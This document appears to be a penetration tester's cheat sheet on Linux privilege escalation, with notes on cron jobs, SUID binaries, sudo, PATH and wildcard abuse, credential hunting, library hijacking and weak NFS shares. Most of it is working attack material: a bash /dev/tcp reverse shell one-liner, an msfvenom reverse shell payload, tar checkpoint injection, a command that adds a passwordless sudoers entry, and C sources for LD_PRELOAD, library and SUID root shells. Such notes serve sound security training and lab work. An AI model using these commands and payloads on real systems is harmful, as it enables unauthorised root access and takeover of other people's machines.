Linux PrivEsc

Kernel Exploits

# checking the Kernel level and Linux OS version.
uname -a
cat /etc/lsb-release

Cron Jobs

# Find world writables files or directories, look for uncommon files which can be leveraged to escalate privelges
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null

# Find cron jobs
cat /etc/crontab

# Confirm the job is running using pspy - <https://github.com/DominicBreuker/pspy>
# The -pf flag tells the tool to print commands and file system events and -i 1000 tells it to scan profcs every 1000ms (or every second).
./pspy64 -pf -i 1000

# If a script is running by a root by a cron job and also writable by us then we can add ou reverse shell one liner to the script
bash -i >& /dev/tcp/ip/443 0>&1

• If a cron job program/script does not use an absolute path, and one of the PATH directories is writable by our user, we may be able to create a program/script with the same name as the cron job.

  # Create a file with esame name as cron job in a directory writable by user which is also included in PATH
  ---
  #!/bin/bash
  cp /bin/bash /tmp/rootbash
  chmod +s /tmp/rootbash
  ---
  
  # make it executable and wait for cron jobto run and then try to execute the script
  /tmp/rootbash –p

Special Permissions

Setuid Bit -

• The Set User ID upon Execution(setuid) permission can allow a user to execute a program or script with the permissions of another user, typically with elevated privileges. The setuidbit appears as an s.

Setgid Bit -

• The Set-Group-ID (setgid) permission is another special permission that allows us to run binaries as if we were part of the group that created them.

# find files with setuid bit set 
find / -user root -perm -4000 -exec ls -ldb {} \\; 2>/dev/null

# find files with setgid bit set
find / -user root -perm -6000 -exec ls -ldb {} \\; 2>/dev/null

# We can use GTFOBins to bypass security restrictions.

Sudo Rights Abuse

# Checking sudo rights of user
sudo -l

# Check GTFObins for any useful abuse

PATH abuse

# Checking PATH content
echo $PATH
env | grep PATH

# Adding to PATH variable
PATH=.:${PATH}
export PATH
echo $PATH

# If we want to run a file in our current directory without specifying path.
touch ls
echo 'echo "PATH ABUSE!!"' > ls
chmod +x ls

Wildcard Abuse

Character	Significance
*	An asterisk that can match any number of characters in a file name.
?	Matches a single character.
[ ]	Brackets enclose characters and can match any single one at the defined position.
~	A tilde at the beginning expands to the name of the user home
directory or can have another username appended to refer to that user's
home directory.
-	A hyphen within brackets will denote a range of characters.

# To add user to sudoers file
echo "eren ALL=(root) NOPASSWD: ALL" >> /etc/sudoers 

# Check if a command is run by any cron job or any script with wildacrd 
# create a reverse shell using msfvenom 
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=53 -f elf -o shell.elf

# Paste the reverse shell where the command is running from
# Create two files in the directory:
touch directory --checkpoint=1
touch directory --checkpoint-action=exec=shell.elf

# wait for job to run and get a root shell

Credential Hunting

# Finding Files which may contain credentials
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null

cat wp-config.php | grep 'DB_USER\\|DB_PASSWORD'

# Also look for SSH Keys

Environment Variable

LD_PRELOAD

# List the programs your user is allowed to run via *sudo*
# Note if the env_keep option includes the LD_PRELOAD environment variable.

# Create c program to get a root shell
---
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
	unsetenv("LD_PRELOAD");
	setresuid(0,0,0);
	system("/bin/bash -p");
}
---

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c

# Run any allowed program using sudo, while setting the LD_PRELOAD environment variable to the full path of the preload.so file:

LD_LIBERARY_PATH

# print the shared object required by a binary or shared object
ldd binary

# Checking RUNPATH configuration
readelf -d binary  | grep PATH

# Compile a shared object with below code to pop a root shell
---
#include<stdio.h>
#include<stdlib.h>

void dbquery() {
    printf("Malicious library loaded\\n");
    setuid(0);
    system("/bin/sh -p");
}
---
gcc src.c -fPIC -shared -o /development/libshared.so <--path where binary is located

Weak NFS Privileges

# List the mountable shares
showmount -e ip

# create a SETUID binary that executes /bin/sh using our local root user. We can then mount the /tmp directory locally, copy the root-owned binary over to the NFS server, and set the SUID bit. 

shell.c
---
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
  setuid(0); setgid(0); system("/bin/bash");
}
---

# compile the binary
gcc shell.c -o shell

# Mount the share
sudo mount -t nfs ip:/tmp /mnt
cp shell /mnt
chmod u+s /mnt/shell

# Run the binary in low prvileged user shell
./shell

Weak file Permission

# Find Writable Directories
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null

# Find Writable Files
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null